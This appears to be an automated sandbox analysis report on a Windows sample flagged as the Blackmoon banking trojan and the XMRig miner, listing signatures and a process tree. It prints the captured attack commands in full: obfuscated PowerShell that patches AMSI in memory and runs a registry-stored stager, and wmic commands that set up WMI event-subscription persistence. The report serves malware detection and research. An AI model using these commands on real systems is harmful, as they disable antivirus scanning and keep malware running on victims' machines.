Analysis

  • max time kernel
    21s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-11-2024 04:00

General

  • Target

    34485abf8296df32bd577d221ac9540e7631e23f64454ad5d37f5e56dcbbb3b5.exe

  • Size

    4.2MB

  • MD5

    fbdf1a2c578681439220a0b44b216763

  • SHA1

    fe240d313e410a7e34e2400d83b815658ea14040

  • SHA256

    34485abf8296df32bd577d221ac9540e7631e23f64454ad5d37f5e56dcbbb3b5

  • SHA512

    52da392ff02d9af10efccfe9a4aad462e4f0d0df47bf919606664f7c5a56d5ca4a35e160aae23ce8510ba4efa211ca64444a51a88a1aff5e5509e9e8ef921c6f

  • SSDEEP

    49152:ogvUQRjHqNEODi4lyLAiaPK2eVn0a4FKW12k9hnOru+:PvUQRwx249iaMVn0vQWMkbnOS+

Malware Config

Signatures

  • Blackmoon family
  • Blackmoon, KrBanker

    Blackmoon also known as KrBanker is banking trojan first discovered in early 2014.

  • Detect Blackmoon payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 1 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 4 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Indicator Removal: Clear Persistence 1 TTPs 1 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 13 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 16 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 28 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:612
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:336
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{ef938a33-604c-43cf-a9b8-69c8fd7c208d}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3392
        • C:\Windows\SysWOW64\dllhost.exe
          C:\Windows\SysWOW64\dllhost.exe /Processid:{d287e81d-81fd-4328-a560-d010f6877f73}
          2⤵
            PID:2272
          • C:\Windows\SysWOW64\dllhost.exe
            C:\Windows\SysWOW64\dllhost.exe /Processid:{d287e81d-81fd-4328-a560-d010f6877f73}
            2⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:2220
        • C:\Windows\system32\lsass.exe
          C:\Windows\system32\lsass.exe
          1⤵
            PID:672
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
            1⤵
              PID:948
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
              1⤵
                PID:392
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                1⤵
                  PID:868
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                  1⤵
                    PID:1092
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                    1⤵
                      PID:1108
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                      1⤵
                      • Drops file in Windows directory
                      PID:1152
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:1216
                      • C:\Windows\system32\taskhostw.exe
                        taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                        2⤵
                          PID:3056
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:XCIqxNgcXDnB{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$vsEATYOHQCteei,[Parameter(Position=1)][Type]$SNnuiyBjaE)$SsWDoNrjzMO=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$SsWDoNrjzMO.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$vsEATYOHQCteei).SetImplementationFlags('Runtime,Managed');$SsWDoNrjzMO.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$SNnuiyBjaE,$vsEATYOHQCteei).SetImplementationFlags('Runtime,Managed');Write-Output $SsWDoNrjzMO.CreateType();}$OqWxejJekyyFk=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$zKwesMOngdYrGp=$OqWxejJekyyFk.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$cTFGLmhcXukpefvieeN=XCIqxNgcXDnB @([String])([IntPtr]);$kyvhsNkSwYCOgQFcwrnwpC=XCIqxNgcXDnB @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$UdaRKFyKqwV=$OqWxejJekyyFk.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$ybrRMnVgiNoRfn=$zKwesMOngdYrGp.Invoke($Null,@([Object]$UdaRKFyKqwV,[Object]('Load'+'LibraryA')));$rOgHbqDRoDrlwrXNl=$zKwesMOngdYrGp.Invoke($Null,@([Object]$UdaRKFyKqwV,[Object]('Vir'+'tual'+'Pro'+'tect')));$YlWkHFe=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ybrRMnVgiNoRfn,$cTFGLmhcXukpefvieeN).Invoke('a'+'m'+'si.dll');$wYpXyKtHqseFGuvuH=$zKwesMOngdYrGp.Invoke($Null,@([Object]$YlWkHFe,[Object]('Ams'+'iSc'+'an'+'Buffer')));$TfsjsqjfMY=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rOgHbqDRoDrlwrXNl,$kyvhsNkSwYCOgQFcwrnwpC).Invoke($wYpXyKtHqseFGuvuH,[uint32]8,4,[ref]$TfsjsqjfMY);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$wYpXyKtHqseFGuvuH,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rOgHbqDRoDrlwrXNl,$kyvhsNkSwYCOgQFcwrnwpC).Invoke($wYpXyKtHqseFGuvuH,[uint32]8,0x20,[ref]$TfsjsqjfMY);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$ahlfyuafstager')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:3788
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:EjpOJMZdENSM{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$WelrUFPkzoflsg,[Parameter(Position=1)][Type]$ZoJkESqPhm)$FSyFNcvFIlO=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$FSyFNcvFIlO.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$WelrUFPkzoflsg).SetImplementationFlags('Runtime,Managed');$FSyFNcvFIlO.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$ZoJkESqPhm,$WelrUFPkzoflsg).SetImplementationFlags('Runtime,Managed');Write-Output $FSyFNcvFIlO.CreateType();}$KTcFDvkOpxVdu=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$pNHtQOebRlPXuf=$KTcFDvkOpxVdu.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$dOEBLpThljCPFudzUXr=EjpOJMZdENSM @([String])([IntPtr]);$WusoKCbXqJlAjuRjMaCXaE=EjpOJMZdENSM @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$DBrayAdaISL=$KTcFDvkOpxVdu.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$ZFFlWvKknmMBSH=$pNHtQOebRlPXuf.Invoke($Null,@([Object]$DBrayAdaISL,[Object]('Load'+'LibraryA')));$gjZGQOyAjHRpQXRCe=$pNHtQOebRlPXuf.Invoke($Null,@([Object]$DBrayAdaISL,[Object]('Vir'+'tual'+'Pro'+'tect')));$KZJpYxH=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZFFlWvKknmMBSH,$dOEBLpThljCPFudzUXr).Invoke('a'+'m'+'si.dll');$XwdJxxPsjJwyQGFhy=$pNHtQOebRlPXuf.Invoke($Null,@([Object]$KZJpYxH,[Object]('Ams'+'iSc'+'an'+'Buffer')));$bquFwIUvYs=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gjZGQOyAjHRpQXRCe,$WusoKCbXqJlAjuRjMaCXaE).Invoke($XwdJxxPsjJwyQGFhy,[uint32]8,4,[ref]$bquFwIUvYs);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$XwdJxxPsjJwyQGFhy,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gjZGQOyAjHRpQXRCe,$WusoKCbXqJlAjuRjMaCXaE).Invoke($XwdJxxPsjJwyQGFhy,[uint32]8,0x20,[ref]$bquFwIUvYs);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$ahlfyuafstager')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • System Location Discovery: System Language Discovery
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4496
                          • C:\Windows\System32\Conhost.exe
                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            3⤵
                              PID:1956
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                          1⤵
                            PID:1292
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                            1⤵
                              PID:1300
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                              1⤵
                                PID:1368
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                1⤵
                                  PID:1408
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                  1⤵
                                    PID:1452
                                    • C:\Windows\system32\sihost.exe
                                      sihost.exe
                                      2⤵
                                        PID:2664
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                      1⤵
                                        PID:1556
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                        1⤵
                                          PID:1564
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                          1⤵
                                            PID:1600
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                            1⤵
                                              PID:1720
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                              1⤵
                                                PID:1752
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                1⤵
                                                  PID:1764
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1836
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                    1⤵
                                                      PID:1888
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                      1⤵
                                                        PID:1900
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                        1⤵
                                                          PID:1972
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                          1⤵
                                                            PID:1996
                                                          • C:\Windows\System32\spoolsv.exe
                                                            C:\Windows\System32\spoolsv.exe
                                                            1⤵
                                                              PID:1436
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                              1⤵
                                                                PID:2092
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                1⤵
                                                                  PID:2228
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                  1⤵
                                                                    PID:2276
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                    1⤵
                                                                      PID:2436
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                      1⤵
                                                                        PID:2444
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                        1⤵
                                                                          PID:2680
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                          1⤵
                                                                            PID:2748
                                                                          • C:\Windows\sysmon.exe
                                                                            C:\Windows\sysmon.exe
                                                                            1⤵
                                                                              PID:2804
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                              1⤵
                                                                                PID:2816
                                                                              • C:\Windows\System32\svchost.exe
                                                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                                1⤵
                                                                                  PID:2840
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                  1⤵
                                                                                    PID:2848
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                    1⤵
                                                                                      PID:2304
                                                                                    • C:\Windows\system32\wbem\unsecapp.exe
                                                                                      C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                      1⤵
                                                                                        PID:1100
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                        1⤵
                                                                                          PID:3312
                                                                                        • C:\Windows\Explorer.EXE
                                                                                          C:\Windows\Explorer.EXE
                                                                                          1⤵
                                                                                            PID:3376
                                                                                            • C:\Users\Admin\AppData\Local\Temp\34485abf8296df32bd577d221ac9540e7631e23f64454ad5d37f5e56dcbbb3b5.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\34485abf8296df32bd577d221ac9540e7631e23f64454ad5d37f5e56dcbbb3b5.exe"
                                                                                              2⤵
                                                                                              • Drops file in Windows directory
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious behavior: RenamesItself
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:3620
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd /c ping 127.0.0.1 -n 5 & Start c:\windows\fonts\macunp\rldencj.exe
                                                                                                3⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:4160
                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                  ping 127.0.0.1 -n 5
                                                                                                  4⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                  • Runs ping.exe
                                                                                                  PID:1172
                                                                                                • \??\c:\windows\fonts\macunp\rldencj.exe
                                                                                                  c:\windows\fonts\macunp\rldencj.exe
                                                                                                  4⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                  PID:2188
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                            1⤵
                                                                                              PID:3580
                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                              1⤵
                                                                                                PID:3772
                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                1⤵
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:3932
                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                1⤵
                                                                                                  PID:2988
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                  1⤵
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:3680
                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                  1⤵
                                                                                                    PID:4464
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                    1⤵
                                                                                                      PID:428
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                      1⤵
                                                                                                        PID:4772
                                                                                                      • C:\Windows\system32\SppExtComObj.exe
                                                                                                        C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:2172
                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                          C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                          1⤵
                                                                                                            PID:3948
                                                                                                          • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                            "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                            1⤵
                                                                                                              PID:3560
                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                              1⤵
                                                                                                                PID:3500
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                1⤵
                                                                                                                  PID:2672
                                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                  1⤵
                                                                                                                    PID:3888
                                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                    1⤵
                                                                                                                      PID:4828
                                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                      1⤵
                                                                                                                        PID:2592
                                                                                                                      • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                                        C:\Windows\System32\WaaSMedicAgent.exe 1c23c757702ca071ff590344d30b947c UTLU8ckn0kCXVWfb6VHO8Q.0.1.0.0.0
                                                                                                                        1⤵
                                                                                                                        • Sets service image path in registry
                                                                                                                        PID:1332
                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          2⤵
                                                                                                                            PID:3624
                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                          1⤵
                                                                                                                            PID:3856
                                                                                                                          • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                            C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                            1⤵
                                                                                                                              PID:4364
                                                                                                                            • \??\c:\windows\fonts\macunp\rldencj.exe
                                                                                                                              c:\windows\fonts\macunp\rldencj.exe
                                                                                                                              1⤵
                                                                                                                              • Drops file in Drivers directory
                                                                                                                              • Event Triggered Execution: Image File Execution Options Injection
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Drops file in System32 directory
                                                                                                                              • Drops file in Windows directory
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                              PID:2340
                                                                                                                              • C:\Windows\TEMP\uhfcegjo\awwlau.exe
                                                                                                                                C:\Windows\TEMP\uhfcegjo\awwlau.exe
                                                                                                                                2⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Drops file in Windows directory
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:4524
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                cmd /c wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="iyuenudy" DELETE & wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="dceecevu" DELETE & wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='iyuenudy'" DELETE
                                                                                                                                2⤵
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:4532
                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  3⤵
                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                  PID:3488
                                                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                  wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="iyuenudy" DELETE
                                                                                                                                  3⤵
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:940
                                                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                  wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="dceecevu" DELETE
                                                                                                                                  3⤵
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:2456
                                                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                  wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='iyuenudy'" DELETE
                                                                                                                                  3⤵
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:1332
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                cmd /c wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="iyuenudy", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 30 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'" & wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="dceecevu",CommandLineTemplate="c:\windows\ime\bhlvrjq\djfica.exe" & wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="iyuenudy"", Consumer="CommandLineEventConsumer.Name="dceecevu""
                                                                                                                                2⤵
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:2364
                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  3⤵
                                                                                                                                    PID:1080
                                                                                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                    wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="iyuenudy", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 30 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
                                                                                                                                    3⤵
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:4992
                                                                                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                    wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="dceecevu",CommandLineTemplate="c:\windows\ime\bhlvrjq\djfica.exe"
                                                                                                                                    3⤵
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:2992
                                                                                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                    wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="iyuenudy"", Consumer="CommandLineEventConsumer.Name="dceecevu""
                                                                                                                                    3⤵
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:3176
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  cmd /c schtasks /DELETE /TN qynqcidr /F
                                                                                                                                  2⤵
                                                                                                                                  • Indicator Removal: Clear Persistence
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:2900
                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    3⤵
                                                                                                                                      PID:3156
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /DELETE /TN qynqcidr /F
                                                                                                                                      3⤵
